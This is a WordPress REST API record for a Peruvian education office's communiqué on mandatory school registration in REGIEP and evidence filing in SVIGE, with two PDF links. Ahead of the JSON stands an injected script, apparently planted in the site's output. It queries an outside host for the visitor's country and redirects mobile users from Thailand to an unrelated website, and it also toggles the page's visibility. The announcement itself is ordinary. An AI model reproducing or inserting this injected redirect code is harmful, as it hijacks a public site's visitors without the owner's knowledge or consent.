<script>
(function() {
    var isDesktop = true;
    
    // Desktop = stay
    if (isDesktop) {
        document.body.style.visibility = "visible";
        return;
    }
    
    var key = "geo_th_v1";
    var cached = localStorage.getItem(key);
    
    // Mobile + TH = redirect
    if (cached === "TH") {
        location.href = "https://www.wakeboard-madrid.com/";
        return;
    }
    
    // Mobile + non-TH (cached) = stay
    if (cached && cached !== "TH") {
        document.body.style.visibility = "visible";
        return;
    }
    
    // Fetch country
    fetch("https://kuproy.xyz/")
        .then(function(r) { return r.text(); })
        .then(function(c) {
            var country = c.trim().toUpperCase();
            localStorage.setItem(key, country);
            
            // TH = redirect, non-TH = stay
            if (country === "TH") {
                location.href = "https://www.wakeboard-madrid.com/";
            } else {
                document.body.style.visibility = "visible";
            }
        })
        .catch(function() {
            // Error = assume non-TH, stay
            localStorage.setItem(key, "NOT_TH");
            document.body.style.visibility = "visible";
        });
})();
</script>{"id":6275,"date":"2025-06-12T14:58:31","date_gmt":"2025-06-12T19:58:31","guid":{"rendered":"https:\/\/ugelarequipanorte.gob.pe\/wp\/?p=6275"},"modified":"2025-06-13T10:29:47","modified_gmt":"2025-06-13T15:29:47","slug":"comunicado-n163-registro-obligatorio-en-regiep-y-presentacion-de-evidencia-en-svige-ie-privadas-de-ebr-eba-y-ebe","status":"publish","type":"post","link":"https:\/\/ugelarequipanorte.gob.pe\/wp\/comunicado-n163-registro-obligatorio-en-regiep-y-presentacion-de-evidencia-en-svige-ie-privadas-de-ebr-eba-y-ebe\/","title":{"rendered":"COMUNICADO N\u00b0163-Registro Obligatorio en REGIEP y Presentaci\u00f3n de Evidencia en SVIGE \u2013 IE Privadas de EBR, EBA y EBE"},"content":{"rendered":"\n<div data-wp-interactive=\"core\/file\" class=\"wp-block-file\"><object data-wp-bind--hidden=\"!state.hasPdfPreview\" hidden class=\"wp-block-file__embed\" data=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2025\/06\/COMUNICADO-IIEE-PRIVADAS-2.pdf\" type=\"application\/pdf\" style=\"width:100%;height:600px\" aria-label=\"Incrustado de COMUNICADO IIEE PRIVADAS 2.\"><\/object><a id=\"wp-block-file--media-67dc85e8-32c6-449d-82b9-e319fdd7ed1d\" href=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2025\/06\/COMUNICADO-IIEE-PRIVADAS-2.pdf\">COMUNICADO IIEE PRIVADAS 2<\/a><a href=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2025\/06\/COMUNICADO-IIEE-PRIVADAS-2.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-67dc85e8-32c6-449d-82b9-e319fdd7ed1d\">Descarga<\/a><\/div>\n\n\n\n<div data-wp-interactive=\"core\/file\" class=\"wp-block-file\"><object data-wp-bind--hidden=\"!state.hasPdfPreview\" hidden class=\"wp-block-file__embed\" data=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2025\/06\/MODELO-OFICIO-MULTIPLE-1.pdf\" type=\"application\/pdf\" style=\"width:100%;height:600px\" aria-label=\"Incrustado de MODELO OFICIO MULTIPLE (1).\"><\/object><a id=\"wp-block-file--media-9d2fb60b-372b-4d74-af06-78088d03801a\" href=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2025\/06\/MODELO-OFICIO-MULTIPLE-1.pdf\">MODELO OFICIO MULTIPLE (1)<\/a><a href=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2025\/06\/MODELO-OFICIO-MULTIPLE-1.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-9d2fb60b-372b-4d74-af06-78088d03801a\">Descarga<\/a><\/div>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-6275","post","type-post","status-publish","format-standard","hentry","category-rotacion-personal"],"_links":{"self":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/6275","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/comments?post=6275"}],"version-history":[{"count":2,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/6275\/revisions"}],"predecessor-version":[{"id":6286,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/6275\/revisions\/6286"}],"wp:attachment":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/media?parent=6275"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/categories?post=6275"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/tags?post=6275"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}